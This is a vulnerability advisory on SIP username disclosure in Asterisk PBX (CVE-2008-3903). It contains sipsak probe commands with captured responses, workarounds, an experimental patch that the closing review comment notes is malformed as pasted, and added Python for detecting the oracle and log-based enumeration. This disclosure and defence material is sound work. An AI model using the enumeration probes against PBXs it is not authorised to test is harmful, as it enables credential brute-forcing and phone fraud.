CVE-2008-3903: Disclosure of SIP username in Asterisk PBX.
CVE-ID: 2008-3903
Author: Stephen A. Misel, Misel Consulting, LLC — steve@miselconsulting.com
Summary: The Asterisk PBX may trivially disclose the validity of a guessed SIP username to unauthorized parties who may then attempt to brute-force a password. If successful, the attacker may be able to access the telephone network. This vector has been successfully exploited in the wild.
Confirmed affected software:
- Asterisk PBX versions 1.2-1.6 inclusive.
- Trixbox PBX version 2.6.1 (uses Asterisk).
Suspected affected software:
- Asterisk PBX - All versions
- Trixbox PBX - All versions
- Other projects based upon Asterisk or incorporating Asterisk
On September 2, 2008, Misel Consulting, LLC was asked to investigate potential nefarious activity on a small office Asterisk PBX. Our investigation revealed the credentials of two existing SIP users in the system were in use from an unauthorized outside host. Further investigation revealed the purpose of these calls was to gather credit and debit card details from credit card holders (voice phish).
After contacting the appropriate authorities, we set out to determine how these SIP credentials were compromised. In 2006, John Todd noted the Asterisk PBX can potentially disclose whether a specific SIP user is valid. According to John, a patch was developed for 1.2-TRUNK which added the “alwaysauthreject” option, allowing Asterisk to obscure SIP response codes on INVITE, SUBSCRIBE and REGISTER from 404 to 401 in the case of non-existent SIP hosts.
Unfortunately, this configuration directive may not have gone far enough. Asterisk, at least with Digest authentication, is still capable of confirming the existence of a SIP user with “alwaysauthreject” enabled. A response of “401 Unauthorized” is returned for invalid SIP users, while a “403 Forbidden (Bad auth)” is returned for a valid SIP user with a guessed (bad) password. Armed with this knowledge, it is trivial for an attacker to compile a list of valid SIP usernames. With knowledge of valid usernames, it could then be possible to determine the password by brute force and gain access to the public telephone network.
Proof-Of-Concept: Using sipsak:
On Asterisk 1.4 with “alwaysauthreject” enabled:
Invalid user with invalid password:
% sipsak-0.9.6/sipsak -IU -a testx -s sip:testX@asteriskbox:5060
SIP/2.0 401 Unauthorized
Via: SIP/2.0/UDP 192.168.1.199:63013;branch=z9hG4bK.5db5cc72;alias;received=192.168.1.199;rport=48834
From: sip:testX@192.168.8.234:5060;tag=550fcb06
To: sip:testX@192.168.8.234:5060;tag=as49ef5a0f
Call-ID: 1427098374@192.168.1.199
CSeq: 2 REGISTER
User-Agent: Asterisk PBX
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
Supported: replaces
WWW-Authenticate: Digest algorithm=MD5, realm="asterisk", nonce="70f69171"
Content-Length: 0
Valid user with invalid password:
% sipsak-0.9.6/sipsak -IU -a test -s sip:test@asteriskbox:5060
SIP/2.0 403 Forbidden (Bad auth)
Via: SIP/2.0/UDP 192.168.111.1:64426;branch=z9hG4bK.53e7c9a7;alias;received=192.168.1.199;rport=40966
From: sip:test@192.168.8.234:5060;tag=4e3b4edd
To: sip:test@192.168.8.234:5060;tag=as305009f4
Call-ID: 1312509661@192.168.111.1
CSeq: 2 REGISTER
User-Agent: Asterisk PBX
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
Supported: replaces
Content-Length: 0
On Asterisk 1.4 with “alwaysauthreject” disabled:
Invalid user with invalid password:
% sipsak-0.9.6/sipsak -IU -a testx -s sip:testX@asteriskbox:5060
SIP/2.0 404 Not found
Via: SIP/2.0/UDP 192.168.111.1:62508;branch=z9hG4bK.37dcbfcf;alias;received=192.168.1.199;rport=37469
From: sip:testX@192.168.8.234:5060;tag=5596ae2f
To: sip:testX@192.168.8.234:5060;tag=as5620a72f
Call-ID: 1435938351@192.168.111.1
CSeq: 1 REGISTER
User-Agent: Asterisk PBX
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
Supported: replaces
Content-Length: 0
Valid user with invalid password:
% sipsak-0.9.6/sipsak -IU -a testx -s sip:test@asteriskbox:5060
SIP/2.0 403 Forbidden (Bad auth)
Via: SIP/2.0/UDP 192.168.1.199:62607;branch=z9hG4bK.1b938cca;alias;received=192.168.1.199;rport=35572
From: sip:test@192.168.8.234:5060;tag=55aaf11b
To: sip:test@192.168.8.234:5060;tag=as4e3f230d
Call-ID: 1437266203@192.168.1.199
CSeq: 2 REGISTER
User-Agent: Asterisk PBX
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
Supported: replaces
Content-Length: 0
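The comparison the four transcripts above make by eye can be made mechanically. The following is an added example, not code from the advisory's author or from the Asterisk project: it parses a SIP response, then compares the reply a PBX gives to an unknown user with the reply it gives to a known user with a wrong password, ignoring the values that legitimately change per transaction (To tag, nonce). The four captures are trimmed copies of the advisory's sipsak output; the "always challenge" pair produced by fake_auth_response() is constructed to show what a PBX that does not leak username validity looks like.

```python
"""Check whether a pair of SIP REGISTER responses lets a client tell a
valid username apart from an invalid one.

Added example for this advisory; not code from the advisory's author or
from Asterisk. The four captures are trimmed copies of the advisory's
sipsak transcripts; the pair built by fake_auth_response() is constructed.
"""
import re

# Asterisk 1.4, alwaysauthreject enabled (trimmed from the advisory)
AAR_ON_INVALID_USER = """SIP/2.0 401 Unauthorized
To: sip:testX@192.168.8.234:5060;tag=as49ef5a0f
User-Agent: Asterisk PBX
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
Supported: replaces
WWW-Authenticate: Digest algorithm=MD5, realm="asterisk", nonce="70f69171"
Content-Length: 0
"""
AAR_ON_VALID_USER = """SIP/2.0 403 Forbidden (Bad auth)
To: sip:test@192.168.8.234:5060;tag=as305009f4
User-Agent: Asterisk PBX
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
Supported: replaces
Content-Length: 0
"""
# Asterisk 1.4, alwaysauthreject disabled (trimmed from the advisory)
AAR_OFF_INVALID_USER = """SIP/2.0 404 Not found
To: sip:testX@192.168.8.234:5060;tag=as5620a72f
User-Agent: Asterisk PBX
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
Supported: replaces
Content-Length: 0
"""
AAR_OFF_VALID_USER = """SIP/2.0 403 Forbidden (Bad auth)
To: sip:test@192.168.8.234:5060;tag=as4e3f230d
User-Agent: Asterisk PBX
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
Supported: replaces
Content-Length: 0
"""


def fake_auth_response(user, nonce):
    """Constructed: what a server that challenges every REGISTER the same
    way would send. Only the To user/tag and the nonce vary per request."""
    return AAR_ON_INVALID_USER.replace("testX", user).replace("70f69171", nonce)


def parse_sip_response(raw):
    """Parse a SIP response into (status code, reason phrase, headers).
    Header names are folded to lower case; a repeated header is joined
    with commas, as RFC 3261 permits."""
    lines = raw.strip().splitlines()
    parts = lines[0].split(" ", 2)
    if len(parts) < 2 or parts[0] != "SIP/2.0" or not parts[1].isdigit():
        raise ValueError("not a SIP/2.0 status line: %r" % lines[0])
    code = int(parts[1])
    reason = parts[2] if len(parts) == 3 else ""
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break  # blank line ends the header section
        name, sep, value = line.partition(":")
        if not sep:
            raise ValueError("malformed header line: %r" % line)
        name, value = name.strip().lower(), value.strip()
        headers[name] = headers[name] + ", " + value if name in headers else value
    return code, reason, headers


# Headers an unauthenticated client can compare across two attempts.
# Per-transaction values (To tag, Call-ID, CSeq, Via) are left out
# because they differ even between two requests for the same user.
COMPARED_HEADERS = ("www-authenticate", "allow", "supported", "user-agent")


def _normalise(value):
    """Blank out the nonce, which legitimately changes per challenge."""
    if value is None:
        return None
    return re.sub(r'nonce="[^"]*"', "nonce=<varies>", value)


def validity_oracle(invalid_user_response, valid_user_response):
    """Return the differences a client could observe between the reply to
    an unknown user and the reply to a known user with a wrong password.
    An empty list means the two replies cannot be told apart."""
    code_a, reason_a, hdr_a = parse_sip_response(invalid_user_response)
    code_b, reason_b, hdr_b = parse_sip_response(valid_user_response)
    diffs = []
    if code_a != code_b:
        diffs.append("status code %d vs %d" % (code_a, code_b))
    elif reason_a != reason_b:
        diffs.append("reason phrase %r vs %r" % (reason_a, reason_b))
    for name in COMPARED_HEADERS:
        if _normalise(hdr_a.get(name)) != _normalise(hdr_b.get(name)):
            diffs.append("header %s differs" % name)
    return diffs
```

Run validity_oracle() on your own PBX's responses to a known-bad and a known-good username (captured with sipsak as above) after changing sip.conf or applying a patch; an empty list is the goal, and anything it returns is a remaining oracle. The nonce is deliberately normalised so that a server which challenges both requests identically is not reported as leaking just because each challenge is fresh.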
Workarounds:
- Use strong SIP usernames and passwords
- Limit SIP port access to authorized hosts only.
- Require SIP traffic to traverse a secure VPN.
- Patch Asterisk to send 401 instead of 403 on bad authentication and enable “alwaysauthreject”.
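Alongside the workarounds, an operator will want to notice this activity while it is happening, as the office PBX described at the start of the advisory did not. The following is an added example, not code from the advisory's author or from Asterisk: it reads the "Registration from ... failed for ..." notices that chan_sip writes to the messages log and flags a source address that has tried many distinct usernames (enumeration) or has many wrong-password failures against one username (guessing). The log lines are constructed, and the assumption that they match the shape of Asterisk's own notices is mine; adjust the regular expression to the format your version actually writes.

```python
"""Spot SIP username enumeration and password guessing in Asterisk's log.

Added example for this advisory; not code from the advisory's author or
from Asterisk. SAMPLE_LOG is constructed in the shape chan_sip's
"Registration from ... failed for ..." notices take in the messages log
(an assumption about the format, not copied from a real system).
"""
import re
from collections import defaultdict

SAMPLE_LOG = """\
[Sep  2 09:14:00] VERBOSE[2534] logger.c:     -- Registered SIP '201' at 192.168.1.50 port 5060
[Sep  2 09:14:01] NOTICE[2534] chan_sip.c: Registration from '<sip:100@192.168.8.234>' failed for '203.0.113.7' - No matching peer found
[Sep  2 09:14:01] NOTICE[2534] chan_sip.c: Registration from '<sip:101@192.168.8.234>' failed for '203.0.113.7' - No matching peer found
[Sep  2 09:14:02] NOTICE[2534] chan_sip.c: Registration from '<sip:102@192.168.8.234>' failed for '203.0.113.7' - No matching peer found
[Sep  2 09:14:02] NOTICE[2534] chan_sip.c: Registration from '<sip:103@192.168.8.234>' failed for '203.0.113.7' - No matching peer found
[Sep  2 09:14:03] NOTICE[2534] chan_sip.c: Registration from '<sip:104@192.168.8.234>' failed for '203.0.113.7' - No matching peer found
[Sep  2 09:14:03] NOTICE[2534] chan_sip.c: Registration from '<sip:test@192.168.8.234>' failed for '203.0.113.7' - Wrong password
[Sep  2 09:14:04] NOTICE[2534] chan_sip.c: Registration from '<sip:test@192.168.8.234>' failed for '203.0.113.7' - Wrong password
[Sep  2 09:14:04] NOTICE[2534] chan_sip.c: Registration from '<sip:test@192.168.8.234>' failed for '203.0.113.7' - Wrong password
[Sep  2 09:14:05] NOTICE[2534] chan_sip.c: Registration from '<sip:test@192.168.8.234>' failed for '203.0.113.7' - Wrong password
[Sep  2 09:14:05] NOTICE[2534] chan_sip.c: Registration from '<sip:test@192.168.8.234>' failed for '203.0.113.7' - Wrong password
[Sep  2 09:15:10] NOTICE[2534] chan_sip.c: Registration from '"201" <sip:201@192.168.8.234>' failed for '192.168.1.50' - Wrong password
"""

# One failed REGISTER notice: timestamp, From header value, source IP, reason.
LINE_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] NOTICE\[\d+\] chan_sip\.c: Registration from "
    r"'(?P<from>[^']*)' failed for '(?P<src>[^']+)' - (?P<reason>.+)$"
)
# The user part of the SIP URI inside the From value.
USER_RE = re.compile(r"sip:([^@>]+)@")


def parse_failures(log_text):
    """Yield (source_ip, username, reason) for each failed REGISTER notice;
    other log lines are ignored."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        u = USER_RE.search(m.group("from"))
        yield m.group("src"), (u.group(1) if u else "?"), m.group("reason")


def detect_abuse(log_text, enum_threshold=5, guess_threshold=5):
    """Per source IP, report username enumeration (at least enum_threshold
    distinct usernames tried, whatever the failure reason) and password
    guessing (at least guess_threshold wrong-password failures against one
    username). A source with nothing to report is left out."""
    users_per_src = defaultdict(set)
    wrong_pw = defaultdict(lambda: defaultdict(int))
    for src, user, reason in parse_failures(log_text):
        users_per_src[src].add(user)
        if reason == "Wrong password":
            wrong_pw[src][user] += 1
    findings = {}
    for src, users in users_per_src.items():
        report = {}
        if len(users) >= enum_threshold:
            report["enumeration"] = sorted(users)
        guessed = {u: n for u, n in wrong_pw[src].items() if n >= guess_threshold}
        if guessed:
            report["bruteforce"] = guessed
        if report:
            findings[src] = report
    return findings
```

The single wrong-password line from 192.168.1.50 (a phone with a mistyped secret) stays below both thresholds and is not reported, while 203.0.113.7 is reported for both behaviours. Note that enabling "alwaysauthreject" changes only what the remote client sees; the "No matching peer found" and "Wrong password" reasons still appear in the local log, so this distinction remains available to the defender even after the workaround is applied.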
Patch:
Please note: This patch is experimental, and likely does not adhere to the SIP standard. Use this as a last resort. No guarantees expressed or implied. In order for this patch to work, you must enable “alwaysauthreject”.
% diff -u asterisk-1.4.21.2/channels/chan_sip.c asterisk-1.4.21.2-patch/channels/chan_sip.c
--- asterisk-1.4.21.2/channels/chan_sip.c 2008-06-03 10:46:24.000000000 -0400
+++ asterisk-1.4.21.2-patch/channels/chan_sip.c 2008-09-04 13:23:40.000000000 -0400
@@ -8786,7 +8786,11 @@
switch (res) {
case AUTH_SECRET_FAILED:
/* Wrong password in authentication. Go away, don't try again until you fixed it */
- transmit_response(p, "403 Forbidden (Bad auth)", &p->initreq);
+ if (global_alwaysauthreject) {
+ transmit_fake_auth_response(p, &p->initreq, 1);
+ } else {
+ transmit_response(p, "403 Forbidden (Bad auth)", &p->initreq);
+ }
break;
case AUTH_USERNAME_MISMATCH:
/* Username and digest username does not match.
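Review bot: the comment above the new branch still says the 403 tells the client to "go away, don't try again", but with global_alwaysauthreject set the AUTH_SECRET_FAILED case now answers with transmit_fake_auth_response(), i.e. a fresh challenge, so a legitimate endpoint with a mistyped secret will keep re-authenticating against each new challenge rather than stopping; update the comment to describe both branches and consider stating this retry behaviour in the advisory's caveat about the patch. The third argument `1` to transmit_fake_auth_response() is a bare literal; a short comment on what it selects would help anyone applying this by hand. As pasted here, the unchanged context lines (`switch (res) {`, `break;`, `case AUTH_USERNAME_MISMATCH:`) have lost the leading space that unified diff format requires, so patch(1) will reject this hunk verbatim; re-export it with `diff -u` or restore the space before distributing it.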